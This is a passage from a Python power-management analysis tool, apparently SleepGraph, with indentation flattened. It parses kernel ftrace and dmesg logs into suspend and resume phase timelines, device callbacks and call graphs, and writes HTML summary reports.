phase = data.setPhase('suspend_noirq', t.time, isbegin)
continue
# suspend_machine/resume_machine
elif(re.match(tp.machinesuspend, t.name)):
lp = data.lastPhase()
if(isbegin):
hwsus = True
if lp.startswith('resume_machine'):
# trim out s2idle loops, track time trying to freeze
llp = data.lastPhase(2)
if llp.startswith('suspend_machine'):
if 'waking' not in data.dmesg[llp]:
data.dmesg[llp]['waking'] = [0, 0.0]
data.dmesg[llp]['waking'][0] += 1
data.dmesg[llp]['waking'][1] += \
t.time - data.dmesg[lp]['start']
data.currphase = ''
del data.dmesg[lp]
continue
phase = data.setPhase('suspend_machine', data.dmesg[lp]['end'], True)
data.setPhase(phase, t.time, False)
if data.tSuspended == 0:
data.tSuspended = t.time
else:
if lp.startswith('resume_machine'):
data.dmesg[lp]['end'] = t.time
continue
phase = data.setPhase('resume_machine', t.time, True)
if(sysvals.suspendmode in ['mem', 'disk']):
susp = phase.replace('resume', 'suspend')
if susp in data.dmesg:
data.dmesg[susp]['end'] = t.time
data.tSuspended = t.time
data.tResumed = t.time
continue
# resume_noirq start
elif(re.match('dpm_resume_noirq\[.*', t.name)):
phase = data.setPhase('resume_noirq', t.time, isbegin)
continue
# resume_early start
elif(re.match('dpm_resume_early\[.*', t.name)):
phase = data.setPhase('resume_early', t.time, isbegin)
continue
# resume start
elif(re.match('dpm_resume\[.*', t.name)):
phase = data.setPhase('resume', t.time, isbegin)
continue
# resume complete start
elif(re.match('dpm_complete\[.*', t.name)):
phase = data.setPhase('resume_complete', t.time, isbegin)
continue
# skip trace events inside devices calls
if(not data.isTraceEventOutsideDeviceCalls(pid, t.time)):
continue
# global events (outside device calls) are graphed
if(name not in testrun.ttemp):
testrun.ttemp[name] = []
# special handling for s2idle_enter
if name == 'machine_suspend':
if hwsus:
s2idle_enter = hwsus = False
elif s2idle_enter and not isbegin:
if(len(testrun.ttemp[name]) > 0):
testrun.ttemp[name][-1]['end'] = t.time
testrun.ttemp[name][-1]['loop'] += 1
elif not s2idle_enter and isbegin:
s2idle_enter = True
testrun.ttemp[name].append({'begin': t.time,
'end': t.time, 'pid': pid, 'loop': 0})
continue
if(isbegin):
# create a new list entry
testrun.ttemp[name].append(\
{'begin': t.time, 'end': t.time, 'pid': pid})
else:
if(len(testrun.ttemp[name]) > 0):
# if an entry exists, assume this is its end
testrun.ttemp[name][-1]['end'] = t.time
# device callback start
elif(t.type == 'device_pm_callback_start'):
if phase not in data.dmesg:
continue
m = re.match('(?P<drv>.*) (?P<d>.*), parent: *(?P<p>.*), .*',\
t.name);
if(not m):
continue
drv = m.group('drv')
n = m.group('d')
p = m.group('p')
if(n and p):
data.newAction(phase, n, pid, p, t.time, -1, drv)
if pid not in data.devpids:
data.devpids.append(pid)
# device callback finish
elif(t.type == 'device_pm_callback_end'):
if phase not in data.dmesg:
continue
m = re.match('(?P<drv>.*) (?P<d>.*), err.*', t.name);
if(not m):
continue
n = m.group('d')
dev = data.findDevice(phase, n)
if dev:
dev['length'] = t.time - dev['start']
dev['end'] = t.time
# kprobe event processing
elif(t.fkprobe):
kprobename = t.type
kprobedata = t.name
key = (kprobename, pid)
# displayname is generated from kprobe data
displayname = ''
if(t.fcall):
displayname = sysvals.kprobeDisplayName(kprobename, kprobedata)
if not displayname:
continue
if(key not in tp.ktemp):
tp.ktemp[key] = []
tp.ktemp[key].append({
'pid': pid,
'begin': t.time,
'end': -1,
'name': displayname,
'cdata': kprobedata,
'proc': m_proc,
})
				# start of kernel suspend
if(data.tKernSus == 0 and phase == 'suspend_prepare' \
and kprobename in ksuscalls):
data.tKernSus = t.time
elif(t.freturn):
if(key not in tp.ktemp) or len(tp.ktemp[key]) < 1:
continue
e = next((x for x in reversed(tp.ktemp[key]) if x['end'] < 0), 0)
if not e:
continue
e['end'] = t.time
e['rdata'] = kprobedata
# end of kernel resume
if(phase != 'suspend_prepare' and kprobename in krescalls):
if phase in data.dmesg:
data.dmesg[phase]['end'] = t.time
data.tKernRes = t.time
# callgraph processing
elif sysvals.usecallgraph:
# create a callgraph object for the data
key = (m_proc, pid)
if(key not in testrun.ftemp):
testrun.ftemp[key] = []
testrun.ftemp[key].append(FTraceCallGraph(pid, sysvals))
# when the call is finished, see which device matches it
cg = testrun.ftemp[key][-1]
res = cg.addLine(t)
if(res != 0):
testrun.ftemp[key].append(FTraceCallGraph(pid, sysvals))
if(res == -1):
testrun.ftemp[key][-1].addLine(t)
tf.close()
if len(testdata) < 1:
sysvals.vprint('WARNING: ftrace start marker is missing')
if data and not data.devicegroups:
sysvals.vprint('WARNING: ftrace end marker is missing')
data.handleEndMarker(t.time, t.name)
if sysvals.suspendmode == 'command':
for test in testruns:
for p in test.data.sortedPhases():
if p == 'suspend_prepare':
test.data.dmesg[p]['start'] = test.data.start
test.data.dmesg[p]['end'] = test.data.end
else:
test.data.dmesg[p]['start'] = test.data.end
test.data.dmesg[p]['end'] = test.data.end
test.data.tSuspended = test.data.end
test.data.tResumed = test.data.end
test.data.fwValid = False
# dev source and procmon events can be unreadable with mixed phase height
if sysvals.usedevsrc or sysvals.useprocmon:
sysvals.mixedphaseheight = False
# expand phase boundaries so there are no gaps
for data in testdata:
lp = data.sortedPhases()[0]
for p in data.sortedPhases():
if(p != lp and not ('machine' in p and 'machine' in lp)):
data.dmesg[lp]['end'] = data.dmesg[p]['start']
lp = p
for i in range(len(testruns)):
test = testruns[i]
data = test.data
# find the total time range for this test (begin, end)
tlb, tle = data.start, data.end
if i < len(testruns) - 1:
tle = testruns[i+1].data.start
# add the process usage data to the timeline
if sysvals.useprocmon:
data.createProcessUsageEvents()
# add the traceevent data to the device hierarchy
if(sysvals.usetraceevents):
# add actual trace funcs
for name in sorted(test.ttemp):
for event in test.ttemp[name]:
if event['end'] - event['begin'] <= 0:
continue
title = name
if name == 'machine_suspend' and 'loop' in event:
title = 's2idle_enter_%dx' % event['loop']
data.newActionGlobal(title, event['begin'], event['end'], event['pid'])
# add the kprobe based virtual tracefuncs as actual devices
for key in sorted(tp.ktemp):
name, pid = key
if name not in sysvals.tracefuncs:
continue
if pid not in data.devpids:
data.devpids.append(pid)
for e in tp.ktemp[key]:
kb, ke = e['begin'], e['end']
if ke - kb < 0.000001 or tlb > kb or tle <= kb:
continue
color = sysvals.kprobeColor(name)
data.newActionGlobal(e['name'], kb, ke, pid, color)
# add config base kprobes and dev kprobes
if sysvals.usedevsrc:
for key in sorted(tp.ktemp):
name, pid = key
if name in sysvals.tracefuncs or name not in sysvals.dev_tracefuncs:
continue
for e in tp.ktemp[key]:
kb, ke = e['begin'], e['end']
if ke - kb < 0.000001 or tlb > kb or tle <= kb:
continue
data.addDeviceFunctionCall(e['name'], name, e['proc'], pid, kb,
ke, e['cdata'], e['rdata'])
if sysvals.usecallgraph:
# add the callgraph data to the device hierarchy
sortlist = dict()
for key in sorted(test.ftemp):
proc, pid = key
for cg in test.ftemp[key]:
if len(cg.list) < 1 or cg.invalid or (cg.end - cg.start == 0):
continue
if(not cg.postProcess()):
id = 'task %s' % (pid)
sysvals.vprint('Sanity check failed for '+\
id+', ignoring this callback')
continue
# match cg data to devices
devname = ''
if sysvals.suspendmode != 'command':
devname = cg.deviceMatch(pid, data)
if not devname:
sortkey = '%f%f%d' % (cg.start, cg.end, pid)
sortlist[sortkey] = cg
elif len(cg.list) > 1000000 and cg.name != sysvals.ftopfunc:
sysvals.vprint('WARNING: the callgraph for %s is massive (%d lines)' %\
(devname, len(cg.list)))
# create blocks for orphan cg data
for sortkey in sorted(sortlist):
cg = sortlist[sortkey]
name = cg.name
if sysvals.isCallgraphFunc(name):
sysvals.vprint('Callgraph found for task %d: %.3fms, %s' % (cg.pid, (cg.end - cg.start)*1000, name))
cg.newActionFromFunction(data)
if sysvals.suspendmode == 'command':
return (testdata, '')
# fill in any missing phases
error = []
for data in testdata:
tn = '' if len(testdata) == 1 else ('%d' % (data.testnumber + 1))
terr = ''
phasedef = data.phasedef
lp = 'suspend_prepare'
for p in sorted(phasedef, key=lambda k:phasedef[k]['order']):
if p not in data.dmesg:
if not terr:
ph = p if 'machine' in p else lp
terr = '%s%s failed in %s phase' % (sysvals.suspendmode, tn, ph)
pprint('TEST%s FAILED: %s' % (tn, terr))
error.append(terr)
if data.tSuspended == 0:
data.tSuspended = data.dmesg[lp]['end']
if data.tResumed == 0:
data.tResumed = data.dmesg[lp]['end']
data.fwValid = False
sysvals.vprint('WARNING: phase "%s" is missing!' % p)
lp = p
if not terr and 'dev' in data.wifi and data.wifi['stat'] == 'timeout':
terr = '%s%s failed in wifi_resume <i>(%s %.0fs timeout)</i>' % \
(sysvals.suspendmode, tn, data.wifi['dev'], data.wifi['time'])
error.append(terr)
if not terr and data.enterfail:
pprint('test%s FAILED: enter %s failed with %s' % (tn, sysvals.suspendmode, data.enterfail))
terr = 'test%s failed to enter %s mode' % (tn, sysvals.suspendmode)
error.append(terr)
if data.tSuspended == 0:
data.tSuspended = data.tKernRes
if data.tResumed == 0:
data.tResumed = data.tSuspended
if(len(sysvals.devicefilter) > 0):
data.deviceFilter(sysvals.devicefilter)
data.fixupInitcallsThatDidntReturn()
if sysvals.usedevsrc:
data.optimizeDevSrc()
# x2: merge any overlapping devices between test runs
if sysvals.usedevsrc and len(testdata) > 1:
tc = len(testdata)
for i in range(tc - 1):
devlist = testdata[i].overflowDevices()
for j in range(i + 1, tc):
testdata[j].mergeOverlapDevices(devlist)
testdata[0].stitchTouchingThreads(testdata[1:])
return (testdata, ', '.join(error))
# Function: loadKernelLog
# Description:
# [deprecated for kernel 3.15.0 or newer]
# load the dmesg file into memory and fix up any ordering issues
# The dmesg filename is taken from sysvals
# Output:
# An array of empty Data objects with only their dmesgtext attributes set
def loadKernelLog():
sysvals.vprint('Analyzing the dmesg data (%s)...' % \
os.path.basename(sysvals.dmesgfile))
if(os.path.exists(sysvals.dmesgfile) == False):
doError('%s does not exist' % sysvals.dmesgfile)
# there can be multiple test runs in a single file
tp = TestProps()
tp.stamp = datetime.now().strftime('# suspend-%m%d%y-%H%M%S localhost mem unknown')
testruns = []
data = 0
lf = sysvals.openlog(sysvals.dmesgfile, 'r')
for line in lf:
line = line.replace('\r\n', '')
idx = line.find('[')
if idx > 1:
line = line[idx:]
if tp.stampInfo(line, sysvals):
continue
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if(not m):
continue
msg = m.group("msg")
if(re.match('PM: Syncing filesystems.*', msg)):
if(data):
testruns.append(data)
data = Data(len(testruns))
tp.parseStamp(data, sysvals)
if(not data):
continue
m = re.match('.* *(?P<k>[0-9]\.[0-9]{2}\.[0-9]-.*) .*', msg)
if(m):
sysvals.stamp['kernel'] = m.group('k')
m = re.match('PM: Preparing system for (?P<m>.*) sleep', msg)
if(m):
sysvals.stamp['mode'] = sysvals.suspendmode = m.group('m')
data.dmesgtext.append(line)
lf.close()
if data:
testruns.append(data)
if len(testruns) < 1:
doError('dmesg log has no suspend/resume data: %s' \
% sysvals.dmesgfile)
# fix lines with same timestamp/function with the call and return swapped
for data in testruns:
last = ''
for line in data.dmesgtext:
mc = re.match('.*(\[ *)(?P<t>[0-9\.]*)(\]) calling '+\
'(?P<f>.*)\+ @ .*, parent: .*', line)
mr = re.match('.*(\[ *)(?P<t>[0-9\.]*)(\]) call '+\
'(?P<f>.*)\+ returned .* after (?P<dt>.*) usecs', last)
if(mc and mr and (mc.group('t') == mr.group('t')) and
(mc.group('f') == mr.group('f'))):
i = data.dmesgtext.index(last)
j = data.dmesgtext.index(line)
data.dmesgtext[i] = line
data.dmesgtext[j] = last
last = line
return testruns
# Function: parseKernelLog
# Description:
# [deprecated for kernel 3.15.0 or newer]
#	 Analyze a dmesg log output file generated from this app during
#	 the execution phase. Create a set of device structures in memory
#	 for subsequent formatting in the html output file.
#	 This call is only for legacy support on kernels where the ftrace
#	 data lacks the suspend_resume or device_pm_callback trace events.
# Arguments:
# data: an empty Data object (with dmesgtext) obtained from loadKernelLog
# Output:
# The filled Data object
def parseKernelLog(data):
phase = 'suspend_runtime'
if(data.fwValid):
sysvals.vprint('Firmware Suspend = %u ns, Firmware Resume = %u ns' % \
(data.fwSuspend, data.fwResume))
# dmesg phase match table
dm = {
'suspend_prepare': ['PM: Syncing filesystems.*'],
'suspend': ['PM: Entering [a-z]* sleep.*', 'Suspending console.*'],
'suspend_late': ['PM: suspend of devices complete after.*'],
'suspend_noirq': ['PM: late suspend of devices complete after.*'],
'suspend_machine': ['PM: noirq suspend of devices complete after.*'],
'resume_machine': ['ACPI: Low-level resume complete.*'],
'resume_noirq': ['ACPI: Waking up from system sleep state.*'],
'resume_early': ['PM: noirq resume of devices complete after.*'],
'resume': ['PM: early resume of devices complete after.*'],
'resume_complete': ['PM: resume of devices complete after.*'],
'post_resume': ['.*Restarting tasks \.\.\..*'],
}
if(sysvals.suspendmode == 'standby'):
dm['resume_machine'] = ['PM: Restoring platform NVS memory']
elif(sysvals.suspendmode == 'disk'):
dm['suspend_late'] = ['PM: freeze of devices complete after.*']
dm['suspend_noirq'] = ['PM: late freeze of devices complete after.*']
dm['suspend_machine'] = ['PM: noirq freeze of devices complete after.*']
dm['resume_machine'] = ['PM: Restoring platform NVS memory']
dm['resume_early'] = ['PM: noirq restore of devices complete after.*']
dm['resume'] = ['PM: early restore of devices complete after.*']
dm['resume_complete'] = ['PM: restore of devices complete after.*']
elif(sysvals.suspendmode == 'freeze'):
dm['resume_machine'] = ['ACPI: resume from mwait']
# action table (expected events that occur and show up in dmesg)
at = {
'sync_filesystems': {
'smsg': 'PM: Syncing filesystems.*',
'emsg': 'PM: Preparing system for mem sleep.*' },
'freeze_user_processes': {
'smsg': 'Freezing user space processes .*',
'emsg': 'Freezing remaining freezable tasks.*' },
'freeze_tasks': {
'smsg': 'Freezing remaining freezable tasks.*',
'emsg': 'PM: Entering (?P<mode>[a-z,A-Z]*) sleep.*' },
'ACPI prepare': {
'smsg': 'ACPI: Preparing to enter system sleep state.*',
'emsg': 'PM: Saving platform NVS memory.*' },
		'PM nvs': {
'smsg': 'PM: Saving platform NVS memory.*',
'emsg': 'Disabling non-boot CPUs .*' },
}
t0 = -1.0
cpu_start = -1.0
prevktime = -1.0
actions = dict()
for line in data.dmesgtext:
# parse each dmesg line into the time and message
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if(m):
val = m.group('ktime')
try:
ktime = float(val)
except:
continue
msg = m.group('msg')
# initialize data start to first line time
if t0 < 0:
data.setStart(ktime)
t0 = ktime
else:
continue
# check for a phase change line
phasechange = False
for p in dm:
for s in dm[p]:
if(re.match(s, msg)):
phasechange, phase = True, p
break
# hack for determining resume_machine end for freeze
if(not sysvals.usetraceevents and sysvals.suspendmode == 'freeze' \
and phase == 'resume_machine' and \
re.match('calling (?P<f>.*)\+ @ .*, parent: .*', msg)):
data.setPhase(phase, ktime, False)
phase = 'resume_noirq'
data.setPhase(phase, ktime, True)
if phasechange:
if phase == 'suspend_prepare':
data.setPhase(phase, ktime, True)
data.setStart(ktime)
data.tKernSus = ktime
elif phase == 'suspend':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'suspend_late':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'suspend_noirq':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'suspend_machine':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'resume_machine':
lp = data.lastPhase()
if(sysvals.suspendmode in ['freeze', 'standby']):
data.tSuspended = prevktime
if lp:
data.setPhase(lp, prevktime, False)
else:
data.tSuspended = ktime
if lp:
data.setPhase(lp, prevktime, False)
data.tResumed = ktime
data.setPhase(phase, ktime, True)
elif phase == 'resume_noirq':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'resume_early':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'resume':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'resume_complete':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setPhase(phase, ktime, True)
elif phase == 'post_resume':
lp = data.lastPhase()
if lp:
data.setPhase(lp, ktime, False)
data.setEnd(ktime)
data.tKernRes = ktime
break
# -- device callbacks --
if(phase in data.sortedPhases()):
# device init call
if(re.match('calling (?P<f>.*)\+ @ .*, parent: .*', msg)):
sm = re.match('calling (?P<f>.*)\+ @ '+\
'(?P<n>.*), parent: (?P<p>.*)', msg);
f = sm.group('f')
n = sm.group('n')
p = sm.group('p')
if(f and n and p):
data.newAction(phase, f, int(n), p, ktime, -1, '')
# device init return
elif(re.match('call (?P<f>.*)\+ returned .* after '+\
'(?P<t>.*) usecs', msg)):
sm = re.match('call (?P<f>.*)\+ returned .* after '+\
'(?P<t>.*) usecs(?P<a>.*)', msg);
f = sm.group('f')
t = sm.group('t')
list = data.dmesg[phase]['list']
if(f in list):
dev = list[f]
dev['length'] = int(t)
dev['end'] = ktime
# if trace events are not available, these are better than nothing
if(not sysvals.usetraceevents):
# look for known actions
for a in sorted(at):
if(re.match(at[a]['smsg'], msg)):
if(a not in actions):
actions[a] = []
actions[a].append({'begin': ktime, 'end': ktime})
if(re.match(at[a]['emsg'], msg)):
if(a in actions):
actions[a][-1]['end'] = ktime
# now look for CPU on/off events
if(re.match('Disabling non-boot CPUs .*', msg)):
# start of first cpu suspend
cpu_start = ktime
elif(re.match('Enabling non-boot CPUs .*', msg)):
# start of first cpu resume
cpu_start = ktime
elif(re.match('smpboot: CPU (?P<cpu>[0-9]*) is now offline', msg)):
# end of a cpu suspend, start of the next
m = re.match('smpboot: CPU (?P<cpu>[0-9]*) is now offline', msg)
cpu = 'CPU'+m.group('cpu')
if(cpu not in actions):
actions[cpu] = []
actions[cpu].append({'begin': cpu_start, 'end': ktime})
cpu_start = ktime
elif(re.match('CPU(?P<cpu>[0-9]*) is up', msg)):
# end of a cpu resume, start of the next
m = re.match('CPU(?P<cpu>[0-9]*) is up', msg)
cpu = 'CPU'+m.group('cpu')
if(cpu not in actions):
actions[cpu] = []
actions[cpu].append({'begin': cpu_start, 'end': ktime})
cpu_start = ktime
prevktime = ktime
data.initDevicegroups()
# fill in any missing phases
phasedef = data.phasedef
terr, lp = '', 'suspend_prepare'
for p in sorted(phasedef, key=lambda k:phasedef[k]['order']):
if p not in data.dmesg:
if not terr:
pprint('TEST FAILED: %s failed in %s phase' % (sysvals.suspendmode, lp))
terr = '%s failed in %s phase' % (sysvals.suspendmode, lp)
if data.tSuspended == 0:
data.tSuspended = data.dmesg[lp]['end']
if data.tResumed == 0:
data.tResumed = data.dmesg[lp]['end']
sysvals.vprint('WARNING: phase "%s" is missing!' % p)
lp = p
lp = data.sortedPhases()[0]
for p in data.sortedPhases():
if(p != lp and not ('machine' in p and 'machine' in lp)):
data.dmesg[lp]['end'] = data.dmesg[p]['start']
lp = p
if data.tSuspended == 0:
data.tSuspended = data.tKernRes
if data.tResumed == 0:
data.tResumed = data.tSuspended
# fill in any actions we've found
for name in sorted(actions):
for event in actions[name]:
data.newActionGlobal(name, event['begin'], event['end'])
if(len(sysvals.devicefilter) > 0):
data.deviceFilter(sysvals.devicefilter)
data.fixupInitcallsThatDidntReturn()
return True
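# Function: callgraphHTML
# Description:
#	 Write a single callgraph out to the html file as a set of nested,
#	 collapsible articles
# Arguments:
#	 sv: the sysvals object
#	 hf: the open html file pointer
#	 num: the next available checkbox id number
#	 cg: the FTraceCallGraph object to render
#	 title, color, devid: display name, background color, and device id
# Output:
#	 The updated checkbox id number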
def callgraphHTML(sv, hf, num, cg, title, color, devid):
html_func_top = '<article id="{0}" class="atop" style="background:{1}">\n<input type="checkbox" class="pf" id="f{2}" checked/><label for="f{2}">{3} {4}</label>\n'
html_func_start = '<article>\n<input type="checkbox" class="pf" id="f{0}" checked/><label for="f{0}">{1} {2}</label>\n'
html_func_end = '</article>\n'
html_func_leaf = '<article>{0} {1}</article>\n'
cgid = devid
if cg.id:
cgid += cg.id
cglen = (cg.end - cg.start) * 1000
if cglen < sv.mincglen:
return num
fmt = '<r>(%.3f ms @ '+sv.timeformat+' to '+sv.timeformat+')</r>'
flen = fmt % (cglen, cg.start, cg.end)
hf.write(html_func_top.format(cgid, color, num, title, flen))
num += 1
for line in cg.list:
if(line.length < 0.000000001):
flen = ''
else:
fmt = '<n>(%.3f ms @ '+sv.timeformat+')</n>'
flen = fmt % (line.length*1000, line.time)
if line.isLeaf():
hf.write(html_func_leaf.format(line.name, flen))
elif line.freturn:
hf.write(html_func_end)
else:
hf.write(html_func_start.format(num, line.name, flen))
num += 1
hf.write(html_func_end)
return num
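# Function: addCallgraphs
# Description:
#	 Write the callgraph data for every timeline device to the html file
# Arguments:
#	 sv: the sysvals object
#	 hf: the open html file pointer
#	 data: the Data object whose devices carry the ftrace callgraphs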
def addCallgraphs(sv, hf, data):
hf.write('<section id="callgraphs" class="callgraph">\n')
# write out the ftrace data converted to html
num = 0
for p in data.sortedPhases():
if sv.cgphase and p != sv.cgphase:
continue
list = data.dmesg[p]['list']
for d in data.sortedDevices(p):
if len(sv.cgfilter) > 0 and d not in sv.cgfilter:
continue
dev = list[d]
color = 'white'
if 'color' in data.dmesg[p]:
color = data.dmesg[p]['color']
if 'color' in dev:
color = dev['color']
name = d if '[' not in d else d.split('[')[0]
if(d in sv.devprops):
name = sv.devprops[d].altName(d)
if 'drv' in dev and dev['drv']:
name += ' {%s}' % dev['drv']
if sv.suspendmode in suspendmodename:
name += ' '+p
if('ftrace' in dev):
cg = dev['ftrace']
if cg.name == sv.ftopfunc:
name = 'top level suspend/resume call'
num = callgraphHTML(sv, hf, num, cg,
name, color, dev['id'])
if('ftraces' in dev):
for cg in dev['ftraces']:
num = callgraphHTML(sv, hf, num, cg,
name+' → '+cg.name, color, dev['id'])
hf.write('\n\n </section>\n')
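# Function: summaryCSS
# Description:
#	 Return the common html header and css used by the summary pages
# Arguments:
#	 title: text for the html title tag
#	 center: center the table cell text if True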
def summaryCSS(title, center=True):
tdcenter = 'text-align:center;' if center else ''
out = '<!DOCTYPE html>\n<html>\n<head>\n\
<meta http-equiv="content-type" content="text/html; charset=UTF-8">\n\
<title>'+title+'</title>\n\
<style type=\'text/css\'>\n\
.stamp {width: 100%;text-align:center;background:#888;line-height:30px;color:white;font: 25px Arial;}\n\
table {width:100%;border-collapse: collapse;border:1px solid;}\n\
th {border: 1px solid black;background:#222;color:white;}\n\
td {font: 14px "Times New Roman";'+tdcenter+'}\n\
tr.head td {border: 1px solid black;background:#aaa;}\n\
tr.alt {background-color:#ddd;}\n\
tr.notice {color:red;}\n\
.minval {background-color:#BBFFBB;}\n\
.medval {background-color:#BBBBFF;}\n\
.maxval {background-color:#FFBBBB;}\n\
.head a {color:#000;text-decoration: none;}\n\
</style>\n</head>\n<body>\n'
return out
# Function: createHTMLSummarySimple
# Description:
# Create summary html file for a series of tests
# Arguments:
# testruns: array of Data objects from parseTraceLog
def createHTMLSummarySimple(testruns, htmlfile, title):
# write the html header first (html head, css code, up to body start)
html = summaryCSS('Summary - SleepGraph')
# extract the test data into list
list = dict()
tAvg, tMin, tMax, tMed = [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [dict(), dict()]
iMin, iMed, iMax = [0, 0], [0, 0], [0, 0]
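	# tAvg/tMin/tMax accumulate the passing suspend/resume times for a mode,
	# tMed maps each time to its row index so min/med/max rows can be linked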
num = 0
useturbo = usewifi = False
lastmode = ''
cnt = dict()
for data in sorted(testruns, key=lambda v:(v['mode'], v['host'], v['kernel'], v['time'])):
mode = data['mode']
if mode not in list:
list[mode] = {'data': [], 'avg': [0,0], 'min': [0,0], 'max': [0,0], 'med': [0,0]}
if lastmode and lastmode != mode and num > 0:
for i in range(2):
s = sorted(tMed[i])
list[lastmode]['med'][i] = s[int(len(s)//2)]
iMed[i] = tMed[i][list[lastmode]['med'][i]]
list[lastmode]['avg'] = [tAvg[0] / num, tAvg[1] / num]
list[lastmode]['min'] = tMin
list[lastmode]['max'] = tMax
list[lastmode]['idx'] = (iMin, iMed, iMax)
tAvg, tMin, tMax, tMed = [0.0, 0.0], [0.0, 0.0], [0.0, 0.0], [dict(), dict()]
iMin, iMed, iMax = [0, 0], [0, 0], [0, 0]
num = 0
pkgpc10 = syslpi = wifi = ''
if 'pkgpc10' in data and 'syslpi' in data:
pkgpc10, syslpi, useturbo = data['pkgpc10'], data['syslpi'], True
if 'wifi' in data:
wifi, usewifi = data['wifi'], True
res = data['result']
tVal = [float(data['suspend']), float(data['resume'])]
list[mode]['data'].append([data['host'], data['kernel'],
data['time'], tVal[0], tVal[1], data['url'], res,
data['issues'], data['sus_worst'], data['sus_worsttime'],
data['res_worst'], data['res_worsttime'], pkgpc10, syslpi, wifi])
idx = len(list[mode]['data']) - 1
if res.startswith('fail in'):
res = 'fail'
if res not in cnt:
cnt[res] = 1
else:
cnt[res] += 1
if res == 'pass':
for i in range(2):
tMed[i][tVal[i]] = idx
tAvg[i] += tVal[i]
if tMin[i] == 0 or tVal[i] < tMin[i]:
iMin[i] = idx
tMin[i] = tVal[i]
if tMax[i] == 0 or tVal[i] > tMax[i]:
iMax[i] = idx
tMax[i] = tVal[i]
num += 1
lastmode = mode
if lastmode and num > 0:
for i in range(2):
s = sorted(tMed[i])
list[lastmode]['med'][i] = s[int(len(s)//2)]
iMed[i] = tMed[i][list[lastmode]['med'][i]]
list[lastmode]['avg'] = [tAvg[0] / num, tAvg[1] / num]
list[lastmode]['min'] = tMin
list[lastmode]['max'] = tMax
list[lastmode]['idx'] = (iMin, iMed, iMax)
# group test header
desc = []
for ilk in sorted(cnt, reverse=True):
if cnt[ilk] > 0:
desc.append('%d %s' % (cnt[ilk], ilk))
html += '<div class="stamp">%s (%d tests: %s)</div>\n' % (title, len(testruns), ', '.join(desc))
th = '\t<th>{0}</th>\n'
td = '\t<td>{0}</td>\n'
tdh = '\t<td{1}>{0}</td>\n'
tdlink = '\t<td><a href="{0}">html</a></td>\n'
cols = 12
if useturbo:
cols += 2
if usewifi:
cols += 1
colspan = '%d' % cols
# table header
html += '<table>\n<tr>\n' + th.format('#') +\
th.format('Mode') + th.format('Host') + th.format('Kernel') +\
th.format('Test Time') + th.format('Result') + th.format('Issues') +\
th.format('Suspend') + th.format('Resume') +\
th.format('Worst Suspend Device') + th.format('SD Time') +\
th.format('Worst Resume Device') + th.format('RD Time')
if useturbo:
html += th.format('PkgPC10') + th.format('SysLPI')
if usewifi:
html += th.format('Wifi')
html += th.format('Detail')+'</tr>\n'
# export list into html
head = '<tr class="head"><td>{0}</td><td>{1}</td>'+\
'<td colspan='+colspan+' class="sus">Suspend Avg={2} '+\
'<span class=minval><a href="#s{10}min">Min={3}</a></span> '+\
'<span class=medval><a href="#s{10}med">Med={4}</a></span> '+\
'<span class=maxval><a href="#s{10}max">Max={5}</a></span> '+\
'Resume Avg={6} '+\
'<span class=minval><a href="#r{10}min">Min={7}</a></span> '+\
'<span class=medval><a href="#r{10}med">Med={8}</a></span> '+\
'<span class=maxval><a href="#r{10}max">Max={9}</a></span></td>'+\
'</tr>\n'
headnone = '<tr class="head"><td>{0}</td><td>{1}</td><td colspan='+\
colspan+'></td></tr>\n'
for mode in sorted(list):
# header line for each suspend mode
num = 0
tAvg, tMin, tMax, tMed = list[mode]['avg'], list[mode]['min'],\
list[mode]['max'], list[mode]['med']
count = len(list[mode]['data'])
if 'idx' in list[mode]:
iMin, iMed, iMax = list[mode]['idx']
html += head.format('%d' % count, mode.upper(),
'%.3f' % tAvg[0], '%.3f' % tMin[0], '%.3f' % tMed[0], '%.3f' % tMax[0],
'%.3f' % tAvg[1], '%.3f' % tMin[1], '%.3f' % tMed[1], '%.3f' % tMax[1],
mode.lower()
)
else:
iMin = iMed = iMax = [-1, -1, -1]
html += headnone.format('%d' % count, mode.upper())
for d in list[mode]['data']:
# row classes - alternate row color
rcls = ['alt'] if num % 2 == 1 else []
if d[6] != 'pass':
rcls.append('notice')
html += '<tr class="'+(' '.join(rcls))+'">\n' if len(rcls) > 0 else '<tr>\n'
# figure out if the line has sus or res highlighted
idx = list[mode]['data'].index(d)
tHigh = ['', '']
for i in range(2):
tag = 's%s' % mode if i == 0 else 'r%s' % mode
if idx == iMin[i]:
tHigh[i] = ' id="%smin" class=minval title="Minimum"' % tag
elif idx == iMax[i]:
tHigh[i] = ' id="%smax" class=maxval title="Maximum"' % tag
elif idx == iMed[i]:
tHigh[i] = ' id="%smed" class=medval title="Median"' % tag
html += td.format("%d" % (list[mode]['data'].index(d) + 1)) # row
html += td.format(mode) # mode
html += td.format(d[0]) # host
html += td.format(d[1]) # kernel
html += td.format(d[2]) # time
html += td.format(d[6]) # result
html += td.format(d[7]) # issues
html += tdh.format('%.3f ms' % d[3], tHigh[0]) if d[3] else td.format('') # suspend
html += tdh.format('%.3f ms' % d[4], tHigh[1]) if d[4] else td.format('') # resume
html += td.format(d[8]) # sus_worst
html += td.format('%.3f ms' % d[9]) if d[9] else td.format('') # sus_worst time
html += td.format(d[10]) # res_worst
html += td.format('%.3f ms' % d[11]) if d[11] else td.format('') # res_worst time
if useturbo:
html += td.format(d[12]) # pkg_pc10
html += td.format(d[13]) # syslpi
if usewifi:
html += td.format(d[14]) # wifi
html += tdlink.format(d[5]) if d[5] else td.format('') # url
html += '</tr>\n'
num += 1
# flush the data to file
hf = open(htmlfile, 'w')
